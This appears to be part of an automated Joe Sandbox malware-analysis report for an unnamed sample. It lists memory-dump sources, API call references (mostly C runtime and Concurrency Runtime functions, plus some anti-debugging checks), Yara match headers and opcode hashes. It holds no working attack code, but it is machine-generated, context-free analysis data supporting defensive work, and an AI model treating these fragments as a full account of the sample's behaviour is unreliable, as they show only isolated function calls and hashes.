                    • Instruction Fuzzy Hash: B4814971E00225AFCF19CFAAC584A7EB7B2BF48305B1546AED445AB701D770B942CB80
                    APIs
                      • Part of subcall function 00422E0C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422E1F
                    • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00421724
                      • Part of subcall function 00422F1F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00422F49
                      • Part of subcall function 00422F1F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00422FB8
                    • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00421856
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 004218B6
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 004218C2
                    • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 004218FD
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0042191E
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0042192A
                    • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00421933
                    • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0042194B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                    • String ID:
                    • API String ID: 2508902052-0
                    • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction ID: 6480c2bc822c7efa029262303f0049bf934a4c623cf990800cc46984c91a1313
                    • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction Fuzzy Hash: 4B816B71F00225AFCB18DF69D5C0A6EB7B6FF98304B6542AED405A7711C774AD42CB88
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID: XgE
                    • API String ID: 597776487-2984570469
                    • Opcode ID: 59c2f5279e58139649a2571c75000e6f8904d99729dbbb22da82a7be1f3ea3b0
                    • Instruction ID: a51b9741262bd5fe43f3912e7d7025e293ddec3c87bb67f0f185d4e0872f58d5
                    • Opcode Fuzzy Hash: 59c2f5279e58139649a2571c75000e6f8904d99729dbbb22da82a7be1f3ea3b0
                    • Instruction Fuzzy Hash: 82C14A71900205AFEB14AF298E41BAF7BA9AF55354F9501AFF880D7381E7BC9E01C758
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: ee95bb351dc8523afcc45ae6b1eea3e4f85a6720880c10ebcf805b516ff891d9
                    • Instruction ID: 1eb0146faae3b0d40eb0c369136c3e86e7d50dd255071a0ab2f6c3c9f3fb89fb
                    • Opcode Fuzzy Hash: ee95bb351dc8523afcc45ae6b1eea3e4f85a6720880c10ebcf805b516ff891d9
                    • Instruction Fuzzy Hash: E7C24E71E046288FEB24CE28DD407EAB7B5EB89705F1441EBD84DE7240E778AE818F45
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044EEFF9
                      • Part of subcall function 044E92A6: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 044E92C7
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 044EF05F
                    • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 044EF077
                    • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 044EF084
                      • Part of subcall function 044EEB27: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 044EEB4F
                      • Part of subcall function 044EEB27: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 044EEBE7
                      • Part of subcall function 044EEB27: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 044EEBF1
                      • Part of subcall function 044EEB27: Concurrency::location::_Assign.LIBCMT ref: 044EEC25
                      • Part of subcall function 044EEB27: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 044EEC2D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                    • String ID:
                    • API String ID: 2363638799-0
                    • Opcode ID: 359cefca154fd1910e9e40920a1d5d2fdc105b942d9e07ab11e460ca5353d7d4
                    • Instruction ID: 482e91517c609c88c665b80f25d1309f6e16d519a1307c8f6c44117a51d15a81
                    • Opcode Fuzzy Hash: 359cefca154fd1910e9e40920a1d5d2fdc105b942d9e07ab11e460ca5353d7d4
                    • Instruction Fuzzy Hash: 1051B471A00214EBDF14DF52C895BBEB771AF44315F1440AAD9026B392CB31BE06CBA1
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042ED92
                      • Part of subcall function 0042903F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00429060
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0042EDF8
                    • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0042EE10
                    • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0042EE1D
                      • Part of subcall function 0042E8C0: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E8E8
                      • Part of subcall function 0042E8C0: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E980
                      • Part of subcall function 0042E8C0: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E98A
                      • Part of subcall function 0042E8C0: Concurrency::location::_Assign.LIBCMT ref: 0042E9BE
                      • Part of subcall function 0042E8C0: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E9C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                    • String ID:
                    • API String ID: 2363638799-0
                    • Opcode ID: 359cefca154fd1910e9e40920a1d5d2fdc105b942d9e07ab11e460ca5353d7d4
                    • Instruction ID: 5dc5f2011173fc565dcc42a134e2cab6d96b6ac4c2e14078affee907e2800f85
                    • Opcode Fuzzy Hash: 359cefca154fd1910e9e40920a1d5d2fdc105b942d9e07ab11e460ca5353d7d4
                    • Instruction Fuzzy Hash: AC51D131B00224EBCF14DF52D885BAEB771AF44314F5540AAE9027B3D2CB38AE45CBA5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: iCD$iCD
                    • API String ID: 0-1699611018
                    • Opcode ID: 0d29ead68d850d4231866edc20dac4a9be113f3423a672bfe0a751cb53d019d0
                    • Instruction ID: 3233a7ddcac68cb8f574e6c19afe3b518d5c820d3ffb50c00228bdd3c5303718
                    • Opcode Fuzzy Hash: 0d29ead68d850d4231866edc20dac4a9be113f3423a672bfe0a751cb53d019d0
                    • Instruction Fuzzy Hash: 7DF15071E002199FEF14CFA9C9806AEB7B1FF48714F25826AE815A7344D774AE05CB94
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 044F6F1D
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 044F6F27
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 044F6F34
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 3f4245e9d6dbb854288b09d2fe4b8be370def5759ab6404053b15e30bb198125
                    • Instruction ID: a1ec147fd007ff8e7f62d4011bc633b662bd5db2d3c1adcc317fc3aec86b99cc
                    • Opcode Fuzzy Hash: 3f4245e9d6dbb854288b09d2fe4b8be370def5759ab6404053b15e30bb198125
                    • Instruction Fuzzy Hash: C431B174901328ABDF21DF69DC8878DBBB8BF08314F5041EAE51CA6251EB74AB858F45
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00436CB6
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00436CC0
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00436CCD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 3f4245e9d6dbb854288b09d2fe4b8be370def5759ab6404053b15e30bb198125
                    • Instruction ID: 0f3886a2ec1acb03bee09038ed9113ddd2f8fdea8ef426ce9efbf04155b938c1
                    • Opcode Fuzzy Hash: 3f4245e9d6dbb854288b09d2fe4b8be370def5759ab6404053b15e30bb198125
                    • Instruction Fuzzy Hash: 9D31F674901328ABCB21DF64D8887CDB7B8BF18315F1051EAE41CA7260E7749B818F49
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,044F68A1,?,?,?,?,?,044F78F5), ref: 044F68C4
                    • TerminateProcess.KERNEL32(00000000,?,044F68A1,?,?,?,?,?,044F78F5), ref: 044F68CB
                    • ExitProcess.KERNEL32 ref: 044F68DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .$GetProcAddress.$l
                    • API String ID: 0-2784972518
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: {2D${2D
                    • API String ID: 0-2096590240
                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0450734B,?,?,00000008,?,?,045061D1,00000000), ref: 0450757D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004470E4,?,?,00000008,?,?,00445F6A,00000000), ref: 00447316
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0041DEB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor
                    • String ID:
                    • API String ID: 2325560087-0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                    • NtFlushProcessWriteBuffers.NTDLL ref: 0041CCBA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BuffersFlushProcessWrite
                    • String ID:
                    • API String ID: 2982998374-0
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001DE26,0041D865), ref: 0041DE1F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 4
                    • API String ID: 0-4088798008
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 4
                    • API String ID: 0-4088798008
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: eD
                    • API String ID: 0-2366279415
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.2275523481.000000000295F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0295F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_295f000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041F3CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::invalid_argument::invalid_argument
                    • String ID: pEvents
                    • API String ID: 2141394445-2498624650
                    APIs
                    • ListArray.LIBCONCRT ref: 00424648
                      • Part of subcall function 00424429: InitializeSListHead.KERNEL32(?,?,00000000,?,?), ref: 004244F5
                      • Part of subcall function 00424429: InitializeSListHead.KERNEL32(?), ref: 004244FF
                    • ListArray.LIBCONCRT ref: 0042467C
                    • Hash.LIBCMT ref: 004246E5
                    • Hash.LIBCMT ref: 004246F5
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 0042478A
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00424797
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 004247A4
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 004247B1
                      • Part of subcall function 00429D51: std::bad_exception::bad_exception.LIBCMT ref: 00429D73
                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00427B25,?,000000FF,00000000), ref: 00424839
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0042485B
                    • GetLastError.KERNEL32(0042559B,?,?,00000000,?,?), ref: 0042486D
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0042488A
                      • Part of subcall function 0041FCBA: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,0042559B,00000008,?,0042488F,?,00000000,00427B16,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0041FCD2
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004248B4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
                    • String ID: LB
                    • API String ID: 2750799244-539997225
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 044FF6AD
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF263
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF275
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF287
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF299
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF2AB
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF2BD
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF2CF
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF2E1
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF2F3
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF305
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF317
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF329
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF33B
                    • _free.LIBCMT ref: 044FF6A2
                      • Part of subcall function 044FB0FC: HeapFree.KERNEL32(00000000,00000000,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?), ref: 044FB112
                      • Part of subcall function 044FB0FC: GetLastError.KERNEL32(?,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?,?), ref: 044FB124
                    • _free.LIBCMT ref: 044FF6C4
                    • _free.LIBCMT ref: 044FF6D9
                    • _free.LIBCMT ref: 044FF6E4
                    • _free.LIBCMT ref: 044FF706
                    • _free.LIBCMT ref: 044FF719
                    • _free.LIBCMT ref: 044FF727
                    • _free.LIBCMT ref: 044FF732
                    • _free.LIBCMT ref: 044FF76A
                    • _free.LIBCMT ref: 044FF771
                    • _free.LIBCMT ref: 044FF78E
                    • _free.LIBCMT ref: 044FF7A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID: 8"F$`'F
                    • API String ID: 161543041-3117062166
                    • Opcode ID: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction ID: bece289eb90947a9b555dc11dd0dcf1eff06cd6ca3bef91064c09fb56bbc8ba9
                    • Opcode Fuzzy Hash: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction Fuzzy Hash: 33315B32600A41EFFF30AA3AEC45B5BB7E8EB05354F10842BE655D6661DE71B845CB14
                    APIs
                    • __EH_prolog3.LIBCMT ref: 044DF3A6
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044DF632
                    Memory Dump Source
